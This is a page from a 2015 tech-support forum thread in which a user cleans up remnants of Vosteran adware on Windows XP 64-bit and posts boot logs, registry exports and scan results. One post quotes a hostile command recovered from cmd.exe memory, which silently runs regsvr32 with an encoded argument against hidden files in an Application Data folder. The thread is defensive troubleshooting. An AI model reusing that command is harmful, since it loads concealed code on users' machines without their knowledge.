The Mother Board

Motherboards.org forums. Free tech support, motherboard ID, and more.
It is currently Fri Sep 21, 2018 6:00 am

All times are UTC - 8 hours




Post new topic Reply to topic  [ 44 posts ]  Go to page Previous  1, 2, 3, 4, 5  Next
Author Message
PostPosted: Mon Jan 12, 2015 7:11 am 
Offline
Mobo-fu Master
Mobo-fu Master

Joined: Sun May 06, 2001 12:01 am
Posts: 37463
Location: Netherlands
Remove Vosteran:
https://forums.malwarebytes.org/index.p ... -vosteran/

the logfile, are you running IIS on that box by any chance?
http://serverfault.com/questions/100380 ... ssion-snag

One other thing I note is you are running in msconfig mode (so temporary disabled some stuff), I can imagine msconfig is doing so through a startup/logon script of some sort.

_________________
We hate rut, but we fear change.
********************************
System error, strike any user to continue...


Top
 Profile  
Reply with quote  
PostPosted: Mon Jan 12, 2015 7:37 am 
Offline
Green Belt
Green Belt

Joined: Tue Apr 15, 2003 12:56 pm
Posts: 217
Location: Dover, NH USA
I am attaching ntBootLog.txt as well as a few reg file containing what I found in the Windows registry

Code:
Loaded driver \SystemRoot\System32\Drivers\a70km16k.SYS
Loaded driver \SystemRoot\System32\Drivers\ax0jhlar.SYS

neither one of thes files physically exist... that is I did a full search of my HDD including all folder and hidden files

these two stood out as suspicious O_o.....

how ever upon checking i found that ax0jhlar is linked to the DAEMON Tools virtual SCSI drive
I had a 2nd Virtual drive a BDROM thru DT.... I got rid of it as I didn't really need two... so I will test boot again...

Code:
[HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 4]
"Interrupt"=dword:00000009
"IOAddress"=dword:0000fff0
"Driver"="ax0jhlar"

Code:
[HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 5]
"Interrupt"=dword:00000009
"IOAddress"=dword:0000ffe8
"Driver"="a70km16k"


________________________________________________________________________
edit:


IIS ( internet information services ) no definitely not, I do not even have it installed.
didn't feel I needed it...



Vosteran!!!!!
yes I did run into that, though I could have sworn I had dealt with it back on the old hdd (ie WinXP-Pro32bit SP3)

what ever the case.. I HIT IT HARD AND WITH A VENGEANCE....

I was grabbing an update from Source Forge ( they have been using these down-loaders, to help programmers generate revenue >_< BOOO ask for donations if u need the $$)

I guess I forgot to click the enable direct link that time... any how I grabbed it and ran...

here is one such project which has the DownLoader/installer $$ links enabled ;_; =(
https://sourceforge.net/projects/filezi ... nt/3.10.0/

since Filezilla (v3.9.0) its been vista and newer only so It probably wasn't this project I had downloaded on...

anyhow before I knew it it was already installing $%^!@#.... so I axed that installer forcefully and proceeded to HACK it out, starting with Spybot S&D and using all available tools including manual searches of the reg and manually hacking it out of FF... i even tried its uninstaller as well probably ....

possible it had left over? though I have made many complete scans using Spybot, M$ MRT, TDSSkiller (its showing clean, so it isn't a rootkit at least....)


Attachments:
Windows Event Viewer Log Files_.rar [2.39 KiB]
Downloaded 56 times
[ntBootLog] & [reg-export].rar [3.5 KiB]
Downloaded 50 times
Top
 Profile  
Reply with quote  
PostPosted: Mon Jan 12, 2015 8:28 am 
Offline
Green Belt
Green Belt

Joined: Tue Apr 15, 2003 12:56 pm
Posts: 217
Location: Dover, NH USA
Attached three images..
file names describe contents png screen shots...


Attachments:
Local User Groups and Accounts_Users.png
Local User Groups and Accounts_Users.png [ 29.98 KiB | Viewed 725 times ]
Local User Groups and Accounts_Groups.png
Local User Groups and Accounts_Groups.png [ 47.67 KiB | Viewed 725 times ]
Device Manager__SPTD_Virtual Devices after all.png
Device Manager__SPTD_Virtual Devices after all.png [ 96.52 KiB | Viewed 725 times ]
Top
 Profile  
Reply with quote  
PostPosted: Mon Jan 12, 2015 9:00 am 
Offline
Green Belt
Green Belt

Joined: Tue Apr 15, 2003 12:56 pm
Posts: 217
Location: Dover, NH USA
I am attaching an archive containing the in memory strings from cmd.exe

I found this among them

Code:
REM/?
or  /F %i in ('dir /b /a:h-d /w "C:\Documents and Settings\All Users\Application Data\1837308050\*"') do start /b regsvr32.exe /s /n /i:"/64 QV0RLkDNJMohCCDWYSLNtdRXIPOZUAogex4Cn5ppPJig1KKm3 " "C:\Documents and Settings\All Users\Application Data\1837308050\%i"
b regsvr32.exe /s /n /i:"/64 QV0RLkDNJMohCCDWYSLNtdRXIPOZUAogex4Cn5ppPJig1KKm3 " "C:\Documents and Settings\All Users\Application Data\1837308050\%i"
r32.exe /s /n /i:"/64 QV0RLkDNJMohCCDWYSLNtdRXIPOZUAogex4Cn5ppPJig1KKm3 " "C:\Documents and Settings\All Users\Application Data\1837308050\%i"
COMSPEC


Attachments:
cmd & drwtsn32 logs.rar [54.58 KiB]
Downloaded 39 times
Top
 Profile  
Reply with quote  
PostPosted: Mon Jan 12, 2015 9:29 am 
Offline
Mobo-fu Master
Mobo-fu Master

Joined: Sun May 06, 2001 12:01 am
Posts: 37463
Location: Netherlands
if bleepingcomputer has no answer:
http://www.bleepingcomputer.com/forums/ ... mpt-error/
then we will have to dig seriously deep. usually they know what is cooking...

_________________
We hate rut, but we fear change.
********************************
System error, strike any user to continue...


Top
 Profile  
Reply with quote  
PostPosted: Mon Jan 12, 2015 9:47 am 
Offline
Mobo-fu Master
Mobo-fu Master

Joined: Wed Nov 12, 2003 11:57 am
Posts: 20860
Location: 07438
Your reference of " Application Data\1837308050\%i " turns up links to Vosteran.. a type of browser virus that wants to redirect you to other sites. "Free" malware with uncertified sites.
http://www.2-viruses.com/remove-vosteran-com-virus

There should be a folder for its files, and look there for an "uninstall" or "unwise" command line.
It should be listed in "Add/remove programs" from the Control Panel. But maybe not.
Might be time to do a Registry edit, taking out any references to it. But do a backup first!
You might be able to do a search for any remnants from the command prompt..
Start > Run > type in cmd and then type in Dir C:\*.vosteran/a/s
That will search all directories, sub-directories and files.. except the Registry.

_________________
F@H.. to solve mankind's maladies.. in our lifetimes!


Top
 Profile  
Reply with quote  
PostPosted: Mon Jan 12, 2015 9:53 am 
Offline
Green Belt
Green Belt

Joined: Tue Apr 15, 2003 12:56 pm
Posts: 217
Location: Dover, NH USA
that Q&A u linked to... no one has replied to it yet....
its definitely looks like the same issue O_o...

but I've been up all night so either I am going for a walk or going to bed

Thx again for Awesome help Motherboards forums ;^_^;
at times when I couldn't solve something on my own
I could always to to Motherboards.org/forums ;^_^;

Eyy Karl, I already axed Vosteran a while back...
I got rid of every trace of it for absolutely certain



scans using MRT come up nothing too...

I will try a test I recreate that folder as named and see if the cmd at least auto exits for now...... no files

_________________________________________________
EDIT:

trying out this program called STOPzilla....... O_o...


Attachments:
STOPZilla Scan pic_40p.jpg
STOPZilla Scan pic_40p.jpg [ 59.72 KiB | Viewed 721 times ]
STOPZilla Scan pic.jpg
STOPZilla Scan pic.jpg [ 68.31 KiB | Viewed 721 times ]
Top
 Profile  
Reply with quote  
PostPosted: Mon Jan 12, 2015 12:21 pm 
Offline
Green Belt
Green Belt

Joined: Tue Apr 15, 2003 12:56 pm
Posts: 217
Location: Dover, NH USA
99.98% of them were false positives

there was one left over conduit entry in the reg.. its gone now but sat next to this one
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
n dword 1

all of the HOST entries WERE ALL Spybot S&D Immunizations so I had to reapply them.. :roll:

another was the not touched or used small exe part of the instal4j that comes with Azureus (Bit-Torrent)
I never click on the offers, and all the updates I get for Azureus come via the dev channel so I never bother the original installer except when doing a fresh install...

after which I did a CCleaner reg scan again and found these..
Code:
[HKEY_CLASSES_ROOT\Mslablti.MarshalableTI]
@="MarshalableTI Class"

[HKEY_CLASSES_ROOT\Mslablti.MarshalableTI\CLSID]
@="{466D66FA-9616-11D2-9342-0000F875AE17}"

[HKEY_CLASSES_ROOT\Mslablti.MarshalableTI\CurVer]
@="Mslablti.MarshalableTI.1"


[HKEY_CLASSES_ROOT\Mslablti.MarshalableTI.1]
@="MarshalableTI Class"

[HKEY_CLASSES_ROOT\Mslablti.MarshalableTI.1\CLSID]
@="{466D66FA-9616-11D2-9342-0000F875AE17}"



the other false positives included:
exes and files used for patching Elder scrolls 3 Morrowind with a graphics overhaul
http://www.nexusmods.com/morrowind/mods/36945/

C:\Program Files\Explorer Suite\
Signature Explorer.exe
which is part of CFF Explorer.exe used for seeing inside of a exe or dll
was suggested for changing the OS and Subsystem minimum on Firefox nightly v37 windows 64bit build so to try and make it run with XP64 (stuff they did requires Vista or newer =p )


so over all STOPzilla was a waste of time >_<

edit:

I tried recreating that folder, no.. no auto closing of that cmd window... whatever.... ;>_<;
C:\Documents and Settings\All Users\Application Data\1837308050




IDK WHAT ^^%$*& STOPZIlla did but it FCK'd Spybots Immunizations there are UN-Immunization-able now.. >_<!!

I have tried deleting the whole key in the reg for each and reapplying the immunizations no go >_<


Attachments:
Spybot_screenshot.jpg
Spybot_screenshot.jpg [ 58.57 KiB | Viewed 721 times ]
immudebug.rar [45.71 KiB]
Downloaded 34 times
Top
 Profile  
Reply with quote  
PostPosted: Mon Jan 12, 2015 5:12 pm 
Offline
Mobo-fu Master
Mobo-fu Master

Joined: Wed Nov 12, 2003 11:57 am
Posts: 20860
Location: 07438
Forgot to include about the CMD prompt.. when done, simply type in " exit " to close.
Hopefully, you have turned off the Windows 'restore' feature while doing this cleansing. If not, Windows will likely undo all your efforts on the next normal boot!
Might be an an idea to kill off all the suspect browser add-ons and similar.. then see what happens.

_________________
F@H.. to solve mankind's maladies.. in our lifetimes!


Top
 Profile  
Reply with quote  
PostPosted: Mon Jan 12, 2015 5:21 pm 
Offline
Green Belt
Green Belt

Joined: Tue Apr 15, 2003 12:56 pm
Posts: 217
Location: Dover, NH USA
a few recommended from a local tech company I know (the guy that owns it helped setup that LAN center I had volunteered for).

Trying HiJackThis.... logs attached..
doesn't appear to be a problem apparent here either... >_<

also I took a screenshot and logs files from RogueKiller64


Code:
explorer.exe
Windows Explorer
v6.00.3790.3959 (srv03_sp2_rtm.070216-1710)
EXPLORER.EXE
Microsoft® Windows® Operating System
1.30 MB (1,364,480 bytes)
Created :  Sunday, February 18, 2007, 7:00:00 AM
Modified:  Sunday, February 18, 2007, 7:00:00 AM


Code:
cryptdll.dll
Cryptography Manager
v5.2.3790.3959 (srv03_sp2_rtm.070216-1710)
cryptdll.dll
Microsoft® Windows® Operating System
47.0 KB (48,128 bytes)
Created :  Sunday, February 18, 2007, 7:00:00 AM
Modified:  Sunday, February 18, 2007, 7:00:00 AM


neither is digitally signed ?! should they be?!

_____________________________________________________________________________________________________

Karlsweldt wrote:
Forgot to include about the CMD prompt.. when done, simply type in " exit " to close.
Hopefully, you have turned off the Windows 'restore' feature while doing this cleansing. If not, Windows will likely undo all your efforts on the next normal boot!
Might be an an idea to kill off all the suspect browser add-ons and similar.. then see what happens.



huh? I never use system restore its the first thing I ax on a ne build as its a waste of resources...
I got rid of the browser stuff some time ago I haven't had any real threat in a long time, only what appears to be a left over at worst ...

I have updated the archive again with adwcleaner_4.107.exe
it found a few things I had missed nothing to bad, I added its logs to the archive..


Attachments:
File comment: Contains the logs for HiJackThis, RogueKiller (and screenshot), adwcleaner, etc
NewLogs and screenshots.rar [180.64 KiB]
Downloaded 43 times
Top
 Profile  
Reply with quote  
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 44 posts ]  Go to page Previous  1, 2, 3, 4, 5  Next

All times are UTC - 8 hours


Who is online

Users browsing this forum: AhrefsBot [Bot], YandexBot [Bot] and 1 guest


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Powered by phpBB® Forum Software © phpBB Group